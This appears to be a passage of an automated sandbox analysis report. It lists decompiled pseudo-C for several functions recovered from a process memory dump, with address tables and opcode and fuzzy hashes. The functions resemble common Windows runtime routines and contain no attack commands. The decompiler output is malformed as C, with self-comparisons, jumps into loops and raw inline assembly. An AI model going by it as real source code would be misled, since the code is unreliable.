Download Yara Rule

C-Code - Quality: 96%

			E00FBEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E00FA9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E00FA2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x00fbef4b
0x00fbef4d
0x00fbef57
0x00fbf0bd
0x00fbf0c2
0x00fbf0d2
0x00fbf0d2
0x00fbf0c2
0x00fbef5d
0x00fbef5f
0x00fbef67
0x00fbef6a
0x00fbef6d
0x00fbef74
0x00fbef7f
0x00fbef82
0x00fbef82
0x00fbef86
0x00fbef88
0x00fbef8c
0x00fbef8f
0x00fbef8f
0x00fbef8f
0x00000000
0x00fbef91
0x00fbef93
0x00fbefc4
0x00fbefc4
0x00fbefc4
0x00fbefca
0x00fbefd0
0x00fbf0a6
0x00000000
0x00000000
0x00fbf0af
0x0100bb06
0x0100bb0a
0x00fbf0b5
0x00fbf0b5
0x00fbf0b5
0x00fbf0b5
0x00000000
0x00fbefd6
0x00fbefd9
0x00fbf0de
0x00fbf0e2
0x00fbefdf
0x00fbefdf
0x00fbefdf
0x00fbefe5
0x0100bafc
0x0100bafc
0x00fbefe5
0x00fbefeb
0x00fbefed
0x00fbf00f
0x00fbf011
0x00fbf01a
0x00fbf01d
0x00fbf021
0x00fbf028
0x00fbf029
0x00fbf029
0x00fbf02c
0x00000000
0x00fbf02c
0x00fbeff3
0x00fbeff9
0x00fbf0ea
0x00fbf0ed
0x00fbf0ef
0x00000000
0x00fbf0ef
0x00fbf003
0x0100bb12
0x00fbf045
0x00fbf049
0x00fbf051
0x00fbf09e
0x00fbf0a0
0x00fbf0a0
0x00fbf09e
0x00fbf053
0x00fbf064
0x00fbf064
0x00fbf06b
0x0100bb1a
0x0100bb1a
0x00fbf071
0x00fbf071
0x00fbf07d
0x00fbf082
0x00fbf08f
0x00fbf08f
0x00fbf009
0x00fbf00d
0x00000000
0x00fbf00d
0x00fbefd0
0x00fbef97
0x00fbefa5
0x00fbefaa
0x00000000
0x00fbefac
0x00fbefac
0x00fbefac
0x00000000
0x00fbefb2
0x00fbf036
0x00fbf03a
0x00fbf040
0x00fbf090
0x00000000
0x00fbf092
0x00fbf042
0x00000000
0x00fbf042
0x00fbefb7
0x00fbefb9
0x00fbefbc
0x00fbefb0
0x00fbefb0
0x00000000
0x00fbefbe
0x00fbefbe
0x00fbefc1
0x00000000
0x00fbefc1
0x00fbefbc
0x00fbefaa
0x00fbef91

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: a48c65cd41eee01120b73ea66bdb7ab3c9cbec866b702187e80661e26abf6ab2
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 50511131E04249DFEB20DB6AC4D07EEBBF1AF05364F2881B8D44593292C375A989EB41

Uniqueness

Uniqueness Score: -1.00%

Function 0107740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0107740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E00FFD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E00FEF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L00FC4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L00FC4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E00FEF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L00FC4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0107740d
0x0107740d
0x01077412
0x01077413
0x01077416
0x01077418
0x0107741c
0x0107741f
0x01077422
0x01077422
0x01077428
0x0107742a
0x0107742a
0x01077451
0x01077432
0x0107744f
0x0107744f
0x00000000
0x01077434
0x01077438
0x01077443
0x01077517
0x01077517
0x0107751a
0x01077535
0x01077520
0x01077527
0x0107752c
0x01077531
0x01077533
0x00000000
0x01077533
0x00000000
0x01077531
0x0107754b
0x0107754f
0x0107755c
0x0107755c
0x0107755f
0x01077560
0x01077561
0x01077562
0x01077563
0x01077568
0x0107756a
0x0107756c
0x0107756d
0x0107756d
0x0107756f
0x01077572
0x01077574
0x01077577
0x0107757c
0x0107757f
0x00000000
0x01077551
0x01077551
0x01077551
0x01077553
0x01077553
0x01077449
0x01077449
0x0107744c
0x0107744c
0x00000000
0x0107744c
0x01077443
0x0107750e
0x01077514
0x01077514
0x01077455
0x01077469
0x0107746d
0x00000000
0x01077473
0x01077473
0x01077476
0x01077480
0x01077484
0x0107748e
0x01077493
0x01077493
0x01077496
0x01077499
0x010774a1
0x010774b1
0x010774b5
0x00000000
0x010774bb
0x010774c1
0x010774c1
0x010774c4
0x010774c5
0x010774c6
0x010774c7
0x010774c8
0x010774cd
0x00000000
0x010774d3
0x010774d3
0x010774d6
0x010774d8
0x010774db
0x010774dd
0x010774e0
0x010774e7
0x010774ee
0x010774ee
0x010774f4
0x010774f9
0x00000000
0x010774fb
0x010774fb
0x010774fd
0x01077500
0x01077503
0x01077505
0x01077505
0x010774f9
0x00000000
0x010774cd
0x010774b5
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: c5cdce7fdeb38fd112e3a9506e0c5723a679dfd239bef2fe565dbb09cb51d1c4
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 7C519D71A00646EFDB16CF18C985A56BBF5FF45344F14C0AAE908DF212E7B1E946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FD2990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00FD2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x107ff00);
				E00FFD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xf81664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E00FEE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xf81668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E010251BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xf8166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E00FD2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E00FB6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E00FD2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E00FBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E00FD2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E00FD2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E00FD2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E00FFD0D1(_t62);
				goto L28;
			}

0x00fd2990
0x00fd2992
0x00fd2997
0x00fd29a3
0x00fd29a6
0x00fd29ab
0x00fd29ad
0x00fd29b2
0x01015c80
0x00fd29b8
0x00fd29b8
0x00fd29bb
0x00fd29c0
0x00fd29c5
0x00fd29c6
0x00fd29c6
0x00fd29cb
0x00000000
0x00000000
0x00fd29cd
0x00fd29d0
0x00fd29d9
0x00fd29db
0x00fd29dd
0x00fd2a7f
0x00fd2a84
0x00fd2a87
0x00fd2a89
0x01015ca1
0x01015ca3
0x00000000
0x00fd2a8f
0x00fd2a8f
0x00000000
0x00fd2a8f
0x00000000
0x00fd29e3
0x00fd29e3
0x00fd29e3
0x00000000
0x00fd29e3
0x00fd29dd
0x00000000
0x00fd29db
0x00fd29e6
0x00fd29e9
0x00fd29eb
0x00fd29ed
0x00fd29f3
0x00fd29f5
0x00fd29f8
0x00fd29fa
0x00fd2a97
0x00fd2a9a
0x00fd2a9d
0x00fd2add
0x00000000
0x00fd2a9f
0x00fd2aa2
0x00fd2aa5
0x00fd2aa8
0x00fd2aab
0x01015cab
0x01015caf
0x01015cc5
0x01015cda
0x01015cdc
0x01015cdf
0x01015ce5
0x00000000
0x01015ceb
0x01015ced
0x01015cee
0x00000000
0x01015cee
0x01015cb1
0x01015cb4
0x01015cb9
0x01015cbb
0x00000000
0x01015cbd
0x01015cbd
0x00000000
0x01015cbd
0x01015cbb
0x00fd2ab1
0x00fd2ab1
0x00fd2ac4
0x00fd2ac6
0x00fd2ac6
0x00000000
0x00fd2ac6
0x00fd2aab
0x00000000
0x00fd2a00
0x00fd2a09
0x00fd2a0e
0x00fd2a21
0x00fd2a24
0x00fd2a35
0x00fd2a3a
0x00fd2a3d
0x00fd2a42
0x00fd2a59
0x00fd2a59
0x00fd2a5c
0x00fd2a5f
0x00fd2a5f
0x00fd29fa
0x00fd29f3
0x00fd2a64
0x00fd2a64
0x00fd2a6b
0x00fd2a6b
0x00fd2a6d
0x00fd2a72
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26159c6b9b67315083a784bd0d8d4999fe453e708c7476a49ea058b0eda49f1c
Instruction ID: 7c8107ccbffe1aad292eff3ae6b8481ef1d945adafc5503adec69c4489d9e4b8
Opcode Fuzzy Hash: 26159c6b9b67315083a784bd0d8d4999fe453e708c7476a49ea058b0eda49f1c
Instruction Fuzzy Hash: 6451473190020A9FCF65DF59C880ADEBBB6FF58310F188156E804AB321D7399D52EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FD4BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00FD4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x109d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E00FACC50(_t86);
					L11:
					return E00FEB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1098504
				E00FC2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E00FEFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E00FEB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L00FC4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E00FACCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1098504
								E00FBFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E00FD4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x00fd4bad
0x00fd4bbf
0x00fd4bc2
0x00fd4bc6
0x00fd4bcd
0x00fd4bd9
0x010167fe
0x01016800
0x00fd4ccc
0x00fd4ccd
0x00fd4cb7
0x00fd4cc9
0x00fd4cc9
0x00fd4bdf
0x00fd4be5
0x00000000
0x00000000
0x00fd4beb
0x00fd4bef
0x00000000
0x00000000
0x00fd4bf5
0x00fd4bf9
0x00fd4c06
0x00fd4c0b
0x00fd4c17
0x00fd4c1c
0x00fd4c1f
0x00fd4c25
0x00fd4c33
0x00fd4c3d
0x00fd4c40
0x00fd4c43
0x00fd4c47
0x00fd4c4d
0x00fd4c53
0x00fd4c54
0x00fd4c55
0x00fd4c56
0x00fd4c5b
0x00fd4c5c
0x00fd4c63
0x00fd4c6b
0x00000000
0x00000000
0x01016776
0x01016784
0x01016784
0x0101679f
0x010167a7
0x010167af
0x010167ce
0x00000000
0x010167b1
0x010167b7
0x010167b8
0x010167c1
0x010167d3
0x010167d9
0x010167dd
0x00fd4c94
0x00fd4c94
0x00fd4c98
0x00fd4c9c
0x00fd4ca3
0x010167f4
0x010167f4
0x00fd4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd4cb5
0x00fd4c79
0x00fd4c7e
0x00fd4c89
0x00fd4c8b
0x00fd4c8f
0x00fd4c8f
0x00000000
0x00fd4c89
0x010167c3
0x00000000
0x010167c3
0x010167af
0x00fd4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 379d2617c52607c260b3a531234609297827210ea862913c473d9b9a71690a1c
Instruction ID: 2cc10736c722ffb28dfd7e4c037942d49fbd37f5a1ed21c89e7c992ec1f42706
Opcode Fuzzy Hash: 379d2617c52607c260b3a531234609297827210ea862913c473d9b9a71690a1c
Instruction Fuzzy Hash: AB41C432A002289BCB21DF68CD41FEA77B5BF45710F0504A6E948AB341D779AE84DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FD4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FD4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x109d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E00FEFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1097bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E00FEB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L00FC4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E00FACCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E00FEB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E00FEF380(_t67 + 0xc, 0xf85138, 0x10) == 0) {
								 *0x10960d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E00FD4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E00FD4E70(0x10986b0, 0xfd5690, 0, 0) != 0) {
					_t46 = E00FACCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x00fd4d3b
0x00fd4d4d
0x00fd4d53
0x00fd4d58
0x00fd4d65
0x00fd4d6c
0x00fd4d71
0x00fd4d77
0x00fd4d7f
0x00fd4d8c
0x00fd4d8e
0x00fd4dad
0x00fd4db0
0x00fd4db7
0x00fd4db8
0x00fd4db9
0x00fd4dba
0x00fd4dbb
0x00fd4dc1
0x00fd4dc8
0x00fd4dcc
0x00fd4dd5
0x00fd4dde
0x00fd4ddf
0x00fd4de0
0x00fd4de1
0x00fd4de6
0x00fd4de7
0x00fd4de9
0x00fd4df3
0x00000000
0x00000000
0x01016c7c
0x01016c8a
0x01016c8a
0x01016c9d
0x01016ca7
0x01016cac
0x01016cb2
0x01016cb9
0x00000000
0x01016cbf
0x01016cbf
0x00000000
0x01016cbf
0x01016cb9
0x00fd4dfb
0x01016ccf
0x01016cd3
0x00fd4e32
0x00fd4e39
0x01016ce0
